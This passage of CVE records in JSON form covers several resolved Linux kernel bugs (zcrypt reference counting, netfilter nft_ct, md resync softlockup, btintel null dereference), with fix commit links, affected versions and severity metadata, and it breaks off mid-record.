kernel: Object 00000000885a74c8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk\n kernel: Object 00000000885a74d8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk\n kernel: Object 00000000885a74e8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk\n kernel: Object 00000000885a74f8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk\n kernel: Object 00000000885a7508: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 68 4b 6b 6b 6b a5 kkkkkkkkkkhKkkk.\n kernel: Redzone 00000000885a7518: bb bb bb bb bb bb bb bb ........\n kernel: Padding 00000000885a756c: 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a ZZZZZZZZZZZZ\n kernel: CPU: 0 PID: 387 Comm: systemd-udevd Not tainted 6.8.0-HF #2\n kernel: Hardware name: IBM 3931 A01 704 (KVM/Linux)\n kernel: Call Trace:\n kernel: [\u003c00000000ca5ab5b8\u003e] dump_stack_lvl+0x90/0x120\n kernel: [\u003c00000000c99d78bc\u003e] check_bytes_and_report+0x114/0x140\n kernel: [\u003c00000000c99d53cc\u003e] check_object+0x334/0x3f8\n kernel: [\u003c00000000c99d820c\u003e] alloc_debug_processing+0xc4/0x1f8\n kernel: [\u003c00000000c99d852e\u003e] get_partial_node.part.0+0x1ee/0x3e0\n kernel: [\u003c00000000c99d94ec\u003e] ___slab_alloc+0xaf4/0x13c8\n kernel: [\u003c00000000c99d9e38\u003e] __slab_alloc.constprop.0+0x78/0xb8\n kernel: [\u003c00000000c99dc8dc\u003e] __kmalloc+0x434/0x590\n kernel: [\u003c00000000c9b4c0ce\u003e] ext4_htree_store_dirent+0x4e/0x1c0\n kernel: [\u003c00000000c9b908a2\u003e] htree_dirblock_to_tree+0x17a/0x3f0\n kernel: \n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-16T07:23:58.655Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7e500849fa558879a1cde43f80c7c048c2437058"
},
{
"url": "https://git.kernel.org/stable/c/9daddee03de3f231012014dab8ab2b277a116a55"
},
{
"url": "https://git.kernel.org/stable/c/6470078ab3d8f222115e11c4ec67351f3031b3dd"
},
{
"url": "https://git.kernel.org/stable/c/a55677878b93e9ebc31f66d0e2fb93be5e7836a6"
},
{
"url": "https://git.kernel.org/stable/c/b7f6c3630eb3f103115ab0d7613588064f665d0d"
},
{
"url": "https://git.kernel.org/stable/c/a64ab862e84e3e698cd351a87cdb504c7fc575ca"
},
{
"url": "https://git.kernel.org/stable/c/befb7f889594d23e1b475720cf93efd2f77df000"
},
{
"url": "https://git.kernel.org/stable/c/394b6d8bbdf9ddee6d5bcf3e1f3e9f23eecd6484"
},
{
"url": "https://git.kernel.org/stable/c/50ed48c80fecbe17218afed4f8bed005c802976c"
}
],
"title": "s390/zcrypt: fix reference counting on zcrypt card objects",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26957",
"datePublished": "2024-05-01T05:19:00.134Z",
"dateReserved": "2024-02-19T14:20:24.200Z",
"dateUpdated": "2025-05-16T07:23:58.655Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26673 (GCVE-0-2024-26673)
Vulnerability from cvelistv5
Published
2024-04-02 06:51
Modified
2025-05-04 08:53
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nft_ct: sanitize layer 3 and 4 protocol number in custom expectations
- Disallow families other than NFPROTO_{IPV4,IPV6,INET}.
- Disallow layer 4 protocol with no ports, since destination port is a
mandatory attribute for this object.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 857b46027d6f91150797295752581b7155b9d0e1 Version: 857b46027d6f91150797295752581b7155b9d0e1 Version: 857b46027d6f91150797295752581b7155b9d0e1 Version: 857b46027d6f91150797295752581b7155b9d0e1 Version: 857b46027d6f91150797295752581b7155b9d0e1 Version: 857b46027d6f91150797295752581b7155b9d0e1 Version: 857b46027d6f91150797295752581b7155b9d0e1 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26673",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-03T15:12:33.164796Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:32.170Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.634Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f549f340c91f08b938d60266e792ff7748dae483"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/65ee90efc928410c6f73b3d2e0afdd762652c09d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b775ced05489f4b77a35fe203e9aeb22f428e38f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0f501dae16b7099e69ee9b0d5c70b8f40fd30e98"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cfe3550ea5df292c9e2d608e8c4560032391847e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/38cc1605338d99205a263707f4dde76408d3e0e8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8059918a1377f2f1fff06af4f5a4ed3d5acd6bc4"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nft_ct.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f549f340c91f08b938d60266e792ff7748dae483",
"status": "affected",
"version": "857b46027d6f91150797295752581b7155b9d0e1",
"versionType": "git"
},
{
"lessThan": "65ee90efc928410c6f73b3d2e0afdd762652c09d",
"status": "affected",
"version": "857b46027d6f91150797295752581b7155b9d0e1",
"versionType": "git"
},
{
"lessThan": "b775ced05489f4b77a35fe203e9aeb22f428e38f",
"status": "affected",
"version": "857b46027d6f91150797295752581b7155b9d0e1",
"versionType": "git"
},
{
"lessThan": "0f501dae16b7099e69ee9b0d5c70b8f40fd30e98",
"status": "affected",
"version": "857b46027d6f91150797295752581b7155b9d0e1",
"versionType": "git"
},
{
"lessThan": "cfe3550ea5df292c9e2d608e8c4560032391847e",
"status": "affected",
"version": "857b46027d6f91150797295752581b7155b9d0e1",
"versionType": "git"
},
{
"lessThan": "38cc1605338d99205a263707f4dde76408d3e0e8",
"status": "affected",
"version": "857b46027d6f91150797295752581b7155b9d0e1",
"versionType": "git"
},
{
"lessThan": "8059918a1377f2f1fff06af4f5a4ed3d5acd6bc4",
"status": "affected",
"version": "857b46027d6f91150797295752581b7155b9d0e1",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nft_ct.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_ct: sanitize layer 3 and 4 protocol number in custom expectations\n\n- Disallow families other than NFPROTO_{IPV4,IPV6,INET}.\n- Disallow layer 4 protocol with no ports, since destination port is a\n mandatory attribute for this object."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:53:39.623Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f549f340c91f08b938d60266e792ff7748dae483"
},
{
"url": "https://git.kernel.org/stable/c/65ee90efc928410c6f73b3d2e0afdd762652c09d"
},
{
"url": "https://git.kernel.org/stable/c/b775ced05489f4b77a35fe203e9aeb22f428e38f"
},
{
"url": "https://git.kernel.org/stable/c/0f501dae16b7099e69ee9b0d5c70b8f40fd30e98"
},
{
"url": "https://git.kernel.org/stable/c/cfe3550ea5df292c9e2d608e8c4560032391847e"
},
{
"url": "https://git.kernel.org/stable/c/38cc1605338d99205a263707f4dde76408d3e0e8"
},
{
"url": "https://git.kernel.org/stable/c/8059918a1377f2f1fff06af4f5a4ed3d5acd6bc4"
}
],
"title": "netfilter: nft_ct: sanitize layer 3 and 4 protocol number in custom expectations",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26673",
"datePublished": "2024-04-02T06:51:05.857Z",
"dateReserved": "2024-02-19T14:20:24.150Z",
"dateUpdated": "2025-05-04T08:53:39.623Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38598 (GCVE-0-2024-38598)
Vulnerability from cvelistv5
Published
2024-06-19 13:45
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
md: fix resync softlockup when bitmap size is less than array size
Is is reported that for dm-raid10, lvextend + lvchange --syncaction will
trigger following softlockup:
kernel:watchdog: BUG: soft lockup - CPU#3 stuck for 26s! [mdX_resync:6976]
CPU: 7 PID: 3588 Comm: mdX_resync Kdump: loaded Not tainted 6.9.0-rc4-next-20240419 #1
RIP: 0010:_raw_spin_unlock_irq+0x13/0x30
Call Trace:
<TASK>
md_bitmap_start_sync+0x6b/0xf0
raid10_sync_request+0x25c/0x1b40 [raid10]
md_do_sync+0x64b/0x1020
md_thread+0xa7/0x170
kthread+0xcf/0x100
ret_from_fork+0x30/0x50
ret_from_fork_asm+0x1a/0x30
And the detailed process is as follows:
md_do_sync
j = mddev->resync_min
while (j < max_sectors)
sectors = raid10_sync_request(mddev, j, &skipped)
if (!md_bitmap_start_sync(..., &sync_blocks))
// md_bitmap_start_sync set sync_blocks to 0
return sync_blocks + sectors_skippe;
// sectors = 0;
j += sectors;
// j never change
Root cause is that commit 301867b1c168 ("md/raid10: check
slab-out-of-bounds in md_bitmap_get_counter") return early from
md_bitmap_get_counter(), without setting returned blocks.
Fix this problem by always set returned blocks from
md_bitmap_get_counter"(), as it used to be.
Noted that this patch just fix the softlockup problem in kernel, the
case that bitmap size doesn't match array size still need to be fixed.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 374fb914304d9b500721007f3837ea8f1f9a2418 Version: b0b971fe7d61411ede63c3291764dbde1577ef2c Version: 39fa14e824acfd470db4f42c354297456bd82b53 Version: a134dd582c0d5b6068efa308bd485cf1d00b3f65 Version: be1a3ec63a840cc9e59a033acf154f56255699a1 Version: 301867b1c16805aebbc306aafa6ecdc68b73c7e5 Version: 301867b1c16805aebbc306aafa6ecdc68b73c7e5 Version: 301867b1c16805aebbc306aafa6ecdc68b73c7e5 Version: 301867b1c16805aebbc306aafa6ecdc68b73c7e5 Version: 152bb26796ff054af50b2ee1b3ca56e364e4f61b Version: bea301c046110bf421a3ce153fb868cb8d618e90 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:42.119Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d4b9c764d48fa41caa24cfb4275f3aa9fb4bd798"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/43771597feba89a839c5f893716df88ae5c237ce"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3f5b73ef8fd6268cbc968b308d8eafe56fda97f3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/69296914bfd508c85935bf5f711cad9b0fe78492"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/71e8e4f288e74a896b6d9cd194f3bab12bd7a10f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c9566b812c8f66160466cc1e29df6d3646add0b1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5817f43ae1a118855676f57ef7ab50e37eac7482"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8bbc71315e0ae4bb7e37f8d43b915e1cb01a481b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f0e729af2eb6bee9eb58c4df1087f14ebaefe26b"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38598",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:13:30.845814Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:54.427Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/md/md-bitmap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d4b9c764d48fa41caa24cfb4275f3aa9fb4bd798",
"status": "affected",
"version": "374fb914304d9b500721007f3837ea8f1f9a2418",
"versionType": "git"
},
{
"lessThan": "43771597feba89a839c5f893716df88ae5c237ce",
"status": "affected",
"version": "b0b971fe7d61411ede63c3291764dbde1577ef2c",
"versionType": "git"
},
{
"lessThan": "3f5b73ef8fd6268cbc968b308d8eafe56fda97f3",
"status": "affected",
"version": "39fa14e824acfd470db4f42c354297456bd82b53",
"versionType": "git"
},
{
"lessThan": "69296914bfd508c85935bf5f711cad9b0fe78492",
"status": "affected",
"version": "a134dd582c0d5b6068efa308bd485cf1d00b3f65",
"versionType": "git"
},
{
"lessThan": "71e8e4f288e74a896b6d9cd194f3bab12bd7a10f",
"status": "affected",
"version": "be1a3ec63a840cc9e59a033acf154f56255699a1",
"versionType": "git"
},
{
"lessThan": "c9566b812c8f66160466cc1e29df6d3646add0b1",
"status": "affected",
"version": "301867b1c16805aebbc306aafa6ecdc68b73c7e5",
"versionType": "git"
},
{
"lessThan": "5817f43ae1a118855676f57ef7ab50e37eac7482",
"status": "affected",
"version": "301867b1c16805aebbc306aafa6ecdc68b73c7e5",
"versionType": "git"
},
{
"lessThan": "8bbc71315e0ae4bb7e37f8d43b915e1cb01a481b",
"status": "affected",
"version": "301867b1c16805aebbc306aafa6ecdc68b73c7e5",
"versionType": "git"
},
{
"lessThan": "f0e729af2eb6bee9eb58c4df1087f14ebaefe26b",
"status": "affected",
"version": "301867b1c16805aebbc306aafa6ecdc68b73c7e5",
"versionType": "git"
},
{
"status": "affected",
"version": "152bb26796ff054af50b2ee1b3ca56e364e4f61b",
"versionType": "git"
},
{
"status": "affected",
"version": "bea301c046110bf421a3ce153fb868cb8d618e90",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/md/md-bitmap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.5"
},
{
"lessThan": "6.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.19.291",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "5.4.251",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "5.10.188",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "5.15.121",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "6.1.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "6.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "6.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "6.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "6.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.4.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd: fix resync softlockup when bitmap size is less than array size\n\nIs is reported that for dm-raid10, lvextend + lvchange --syncaction will\ntrigger following softlockup:\n\nkernel:watchdog: BUG: soft lockup - CPU#3 stuck for 26s! [mdX_resync:6976]\nCPU: 7 PID: 3588 Comm: mdX_resync Kdump: loaded Not tainted 6.9.0-rc4-next-20240419 #1\nRIP: 0010:_raw_spin_unlock_irq+0x13/0x30\nCall Trace:\n \u003cTASK\u003e\n md_bitmap_start_sync+0x6b/0xf0\n raid10_sync_request+0x25c/0x1b40 [raid10]\n md_do_sync+0x64b/0x1020\n md_thread+0xa7/0x170\n kthread+0xcf/0x100\n ret_from_fork+0x30/0x50\n ret_from_fork_asm+0x1a/0x30\n\nAnd the detailed process is as follows:\n\nmd_do_sync\n j = mddev-\u003eresync_min\n while (j \u003c max_sectors)\n sectors = raid10_sync_request(mddev, j, \u0026skipped)\n if (!md_bitmap_start_sync(..., \u0026sync_blocks))\n // md_bitmap_start_sync set sync_blocks to 0\n return sync_blocks + sectors_skippe;\n // sectors = 0;\n j += sectors;\n // j never change\n\nRoot cause is that commit 301867b1c168 (\"md/raid10: check\nslab-out-of-bounds in md_bitmap_get_counter\") return early from\nmd_bitmap_get_counter(), without setting returned blocks.\n\nFix this problem by always set returned blocks from\nmd_bitmap_get_counter\"(), as it used to be.\n\nNoted that this patch just fix the softlockup problem in kernel, the\ncase that bitmap size doesn\u0027t match array size still need to be fixed."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:50.770Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d4b9c764d48fa41caa24cfb4275f3aa9fb4bd798"
},
{
"url": "https://git.kernel.org/stable/c/43771597feba89a839c5f893716df88ae5c237ce"
},
{
"url": "https://git.kernel.org/stable/c/3f5b73ef8fd6268cbc968b308d8eafe56fda97f3"
},
{
"url": "https://git.kernel.org/stable/c/69296914bfd508c85935bf5f711cad9b0fe78492"
},
{
"url": "https://git.kernel.org/stable/c/71e8e4f288e74a896b6d9cd194f3bab12bd7a10f"
},
{
"url": "https://git.kernel.org/stable/c/c9566b812c8f66160466cc1e29df6d3646add0b1"
},
{
"url": "https://git.kernel.org/stable/c/5817f43ae1a118855676f57ef7ab50e37eac7482"
},
{
"url": "https://git.kernel.org/stable/c/8bbc71315e0ae4bb7e37f8d43b915e1cb01a481b"
},
{
"url": "https://git.kernel.org/stable/c/f0e729af2eb6bee9eb58c4df1087f14ebaefe26b"
}
],
"title": "md: fix resync softlockup when bitmap size is less than array size",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38598",
"datePublished": "2024-06-19T13:45:47.309Z",
"dateReserved": "2024-06-18T19:36:34.932Z",
"dateUpdated": "2025-11-04T17:21:42.119Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-35933 (GCVE-0-2024-35933)
Vulnerability from cvelistv5
Published
2024-05-19 10:10
Modified
2025-05-04 09:08
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btintel: Fix null ptr deref in btintel_read_version
If hci_cmd_sync_complete() is triggered and skb is NULL, then
hdev->req_skb is NULL, which will cause this issue.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35933",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-23T19:20:29.908054Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:34:54.538Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.082Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ec2049fb2b8be3e108fe2ef1f1040f91e72c9990"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/68a69bb2ecafaacdb998a87783068fb51736f43b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/86e9b47e8a75c74b1bd83a479979b425c5dc8bd9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/006936ecb4edfc3102464044f75858c714e34d28"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b19fe5eea619d54eea59bb8a37c0f8d00ef0e912"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ffdca0a62abaf8c41d8d9ea132000fd808de329b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/22d3053ef05f0b5045e45bd91e7473846261d65e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b79e040910101b020931ba0c9a6b77e81ab7f645"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/bluetooth/btintel.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ec2049fb2b8be3e108fe2ef1f1040f91e72c9990",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "68a69bb2ecafaacdb998a87783068fb51736f43b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "86e9b47e8a75c74b1bd83a479979b425c5dc8bd9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "006936ecb4edfc3102464044f75858c714e34d28",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b19fe5eea619d54eea59bb8a37c0f8d00ef0e912",
"status": "affected",
